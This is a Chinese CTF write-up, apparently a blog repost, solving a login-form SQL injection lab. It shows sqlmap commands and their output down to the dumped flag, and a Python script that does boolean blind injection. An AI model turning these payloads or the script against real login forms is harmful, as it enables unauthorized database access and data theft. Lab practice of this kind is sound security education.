CTF 小白教程《从0到1:CTFer成长之路》SQL - 2 解题过程

Posted 在下小黄

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTF 小白教程《从0到1:CTFer成长之路》SQL - 2 解题过程相关的知识,希望对你有一定的参考价值。

大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
未经允许,禁止转载 ,违者必究!!!!
本实验仅适用于学习和测试 ,严禁违法操作 ! ! !
今天更新的是:

在这里插入图片描述


创建时间:2021年5月30日
软件: MindMaster Pro、kali


CTF中的SQL注入

第四题 SQL - 2

  • 一开始我以为这题环境进不去,后来才发现应该进的是login.php
  • 习惯性的查看源代码:发现: 如果觉得太难了,可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦。
  • 在这里插入图片描述
  • 我直接认输,掏出我的BP 来测试一波

在这里插入图片描述 在这里插入图片描述 在这里插入图片描述

  • 鼠标右键,复制保存文件,名称自定义,将文件格式改成.txt方便我们后面利用
  • 我将文件命名成3333.txt下面将利用到。

在这里插入图片描述

第一种解法:利用SQLmap工具

  • 根据题目环境,我们采用POST - 登录框注入方法。
  • 为什么采用POST - 登录框注入方法呢? 相信很多小伙伴一定会有疑问了。

像这种是登录窗口的,URL中不是以id=xxxx结尾的就可以采用这种方法进行尝试
http:// www.xxx.com /Login.asp
http://eci-2zeaeeh8hdp3xetqte3p.cloudeci1.ichunqiu.com/login.php

  • 将保存的3333.txt,剪切到kali里面,在终端中打开。(这属于基操,就不演示了)
  • 让我们来尝试破解吧。
  • 尝试找到注入点,指令: sqlmap -r 文件名.txt
 sqlmap -r 3333.txt    
  • 爆破的得到的信息:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=admin' AND 3237=3237 AND 'pPVI'='pPVI&pass=123456

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=admin' AND (SELECT 8314 FROM (SELECT(SLEEP(5)))Ffoa) AND 'eRQd'='eRQd&pass=123456
---

在这里插入图片描述

  • sqlmap爆当前数据库信息

  • 尝试获取数据库信息,指令:sqlmap -r 文件名.txt --current-db

sqlmap -r 3333.txt --current-db 
  • 爆破的得到的信息:
current database: 'note'
  • 用sqlmap爆出库名:note

在这里插入图片描述

  • sqlmap.列出指定数据库所有的表名
  • 尝试获取列出指定数据库所有的表名,指令: sqlmap -r 文件名.txt -D note(指定数据库名) --tables
sqlmap -r 3333.txt -D note --tables
  • 爆破的得到的信息:
Database: note
[2 tables]
+-------+
| fl4g  |
| users |
+-------+
  • 用sqlmap爆出表名:fl4g,users

在这里插入图片描述

  • sqlmap 列出指定表名的所有列名
  • 尝试获取列出指定表名的所有列名,指令: sqlmap -r 文件名.txt -D note(指定数据库名 )-T fl4g(指定的表名) --columns(全部表)
 sqlmap -r 3333.txt -D note -T fl4g --columns  
  • 爆破的得到的信息:
Database: note
Table: fl4g
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| flag   | varchar(40) |
+--------+-------------+
  • 用sqlmap爆出列名:flag

在这里插入图片描述

  • sqlmap 打印输出表名指定列名字段的值数据
  • 尝试打印输出表名指定列名字段的值数据,指令: sqlmap -r 文件名.txt -D note(指定数据库名 )-T fl4g(指定的表名) -C flag(指定字段名) --dump (将结果导出)
sqlmap -r 3333.txt -D note -T fl4g  -C flag --dump
  • 爆破的得到的信息:
Database: note
Table: fl4g
[1 entry]
+----------------------------+
| flag                       |
+----------------------------+
| n1book{login_sqli_is_nice} |
+----------------------------+

在这里插入图片描述

  • 终于拿到 flag:n1book{login_sqli_is_nice}大功告成。

在这里插入图片描述

第二种解法:利用Python脚本跑

  • 利用脚本进行布尔型注入
  • 脚本内涉及的信息根据自己用bp截取的数据进行修改。
import requests


def Get(url):
    result = ''
    for i in range(1, 100):
        left = 32
        right = 128
        mid = (left + right) // 2
        while left < right:
            # 查询表名
            # name = "admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables " \\
            #        "where table_schema=database()),{0},1))>{1},1,0)#".format(i,mid)

            # 查询列名
            # name = "admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns " \\
            #        "where table_schema=database() and table_name='fl4g'),{0},1))>{1},1,0)#".format(i,mid)

            # 根据表名和列名查询字段值
            name = "admin' and if(ascii(mid((Select flag from fl4g),{0},1))>{1},1,0)#".format(i, mid)

            data = {"name": name, "pass": "1223234"}
            res = requests.post(url, data)

            # 这里输入你的正确回显参数 :{"error":1,"msg":"\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef"}
            if "\\\\u8d26\\\\u53f7\\\\u6216\\\\u5bc6\\\\u7801\\\\u9519\\\\u8bef" in res.content.decode():
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        # 查询结果结束
        if mid == 32:
            break
        result += chr(mid)
        print(result)
    print(result)

# 这里你的输入URL:
Get('http://eci-2ze95405pp0e0j1nojmj.cloudeci1.ichunqiu.com/login.php')

  • 得到 flag:n1book{login_sqli_is_nice}大功告成。

在这里插入图片描述___


各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。

每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
在这里插入图片描述

博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!


以上是关于CTF 小白教程《从0到1:CTFer成长之路》SQL - 2 解题过程的主要内容,如果未能解决你的问题,请参考以下文章

从0到1的CTFer成长之路的docker环境配置

从0到1的CTFer成长之路的docker环境配置

从0到1的CTFer成长之路的docker环境配置

《从0到1:CTFer成长之路》解题

《从0到1:CTFer成长之路》解题

《从0到1:CTFer成长之路》解题